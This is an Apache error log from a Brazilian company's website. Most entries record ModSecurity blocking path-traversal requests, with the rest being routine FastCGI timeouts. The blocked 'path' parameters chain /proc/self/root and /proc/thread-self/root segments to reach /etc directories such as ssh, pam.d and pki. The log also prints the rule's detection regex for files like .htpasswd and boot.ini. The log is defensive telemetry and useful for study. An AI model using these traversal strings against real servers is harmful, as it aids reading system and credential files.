[Tue Mar 17 15:26:42.439156 2026] [:error] [pid 2473:tid 140411540502272] [client 74.7.243.128:35642] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmc4qBJNF7axNlVR0UhFQAAABg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:26:51.798351 2026] [:error] [pid 7004:tid 140411565680384] [client 74.7.241.31:60380] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmc68U6Sx0TG1YjmQi3vAAAApU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:26:58.121736 2026] [proxy_fcgi:error] [pid 17965:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:36004] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:27:18.905796 2026] [mime_magic:error] [pid 2598:tid 140411741927168] (70014)End of file found: [client 216.73.216.191:55341] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Tue Mar 17 15:27:20.124394 2026] [proxy_fcgi:error] [pid 7437:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:36316] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:27:43.122686 2026] [proxy_fcgi:error] [pid 7004:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:36624] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:28:06.121772 2026] [proxy_fcgi:error] [pid 29151:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:36954] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:28:27.585584 2026] [:error] [pid 19507:tid 140411590858496] [client 74.7.244.43:33190] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abmdS9Y0UrI5A3LftIwFlQAAAZI"]
[Tue Mar 17 15:28:28.129884 2026] [proxy_fcgi:error] [pid 9299:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:37342] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:28:47.582567 2026] [:error] [pid 29151:tid 140411540502272] [client 74.7.228.61:38018] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abmdX_PqhzTj3BvfDX-QOQAAAdg"]
[Tue Mar 17 15:28:49.156538 2026] [proxy_fcgi:error] [pid 6296:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:37694] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:29:12.045834 2026] [proxy_fcgi:error] [pid 17965:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:38094] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:29:17.629554 2026] [mime_magic:error] [pid 19507:tid 140411599251200] (70014)End of file found: [client 216.73.216.191:6979] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Tue Mar 17 15:29:17.629752 2026] [access_compat:error] [pid 19507:tid 140411599251200] [client 216.73.216.191:6979] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5
[Tue Mar 17 15:29:34.057905 2026] [proxy_fcgi:error] [pid 19507:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:38516] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:29:38.374735 2026] [:error] [pid 7004:tid 140411616036608] [client 74.7.241.31:46002] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmdksU6Sx0TG1YjmQi4KgAAAo8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 15:29:40.260939 2026] [:error] [pid 17965:tid 140411674785536] [client 74.7.241.31:58288] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmdlKt8Nd0UC_OcbVHSygAAAIg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 15:29:45.327304 2026] [:error] [pid 7004:tid 140411599251200] [client 74.7.241.31:58304] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmdmMU6Sx0TG1YjmQi4LgAAApE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 15:29:46.601663 2026] [:error] [pid 17965:tid 140411557287680] [client 74.7.241.31:58318] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmdmqt8Nd0UC_OcbVHSywAAAJY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 15:29:49.620466 2026] [:error] [pid 2598:tid 140411616036608] [client 74.7.241.31:36430] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmdnRj0p0SRWAqcjGGCPgAAAw8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:29:54.448198 2026] [:error] [pid 18380:tid 140411557287680] [client 74.7.241.31:36446] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmdoq4xEDsg_V3ESNZUzgAAAhY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 15:29:57.097940 2026] [proxy_fcgi:error] [pid 7437:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:39118] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:29:58.060890 2026] [:error] [pid 7437:tid 140411716749056] [client 74.7.243.128:53126] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmdpQeiSKl8TjouI-Yh3gAAA8M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:29:59.215764 2026] [:error] [pid 2598:tid 140411683178240] [client 74.7.241.31:36454] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmdpxj0p0SRWAqcjGGCQgAAAwc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 15:30:18.109811 2026] [proxy_fcgi:error] [pid 19507:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:39688] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:30:19.940807 2026] [:error] [pid 7004:tid 140411548894976] [client 74.7.241.31:57506] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmdu8U6Sx0TG1YjmQi4PwAAApc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:30:21.556055 2026] [:error] [pid 17965:tid 140411565680384] [client 74.7.241.31:35100] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmdvat8Nd0UC_OcbVHS2AAAAJU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 15:30:25.832072 2026] [:error] [pid 6296:tid 140411565680384] [client 74.7.243.128:54908] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmdwXIk7brgkOH-rIWUNQAAAVU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:30:41.125794 2026] [proxy_fcgi:error] [pid 19507:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:40278] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:30:45.208039 2026] [:error] [pid 19507:tid 140411674785536] [client 74.7.241.31:35112] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmd1dY0UrI5A3LftIwF8AAAAYg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 15:30:48.423316 2026] [:error] [pid 2598:tid 140411708356352] [client 74.7.241.31:60822] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmd2Bj0p0SRWAqcjGGCUwAAAwQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:30:55.797273 2026] [:error] [pid 6296:tid 140411632822016] [client 74.7.241.31:45162] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmd33Ik7brgkOH-rIWUQAAAAU0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:31:09.131530 2026] [proxy_fcgi:error] [pid 2598:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:40696] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:31:22.523440 2026] [:error] [pid 2473:tid 140411548894976] [client 74.7.241.31:49148] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmd-qBJNF7axNlVR0UhjQAAABc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 15:31:24.319779 2026] [:error] [pid 29151:tid 140411683178240] [client 74.7.241.31:60134] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmd_PPqhzTj3BvfDX-QdgAAAcc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 15:31:33.129778 2026] [proxy_fcgi:error] [pid 6296:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:41102] AH01075: Error dispatching request to : (polling)
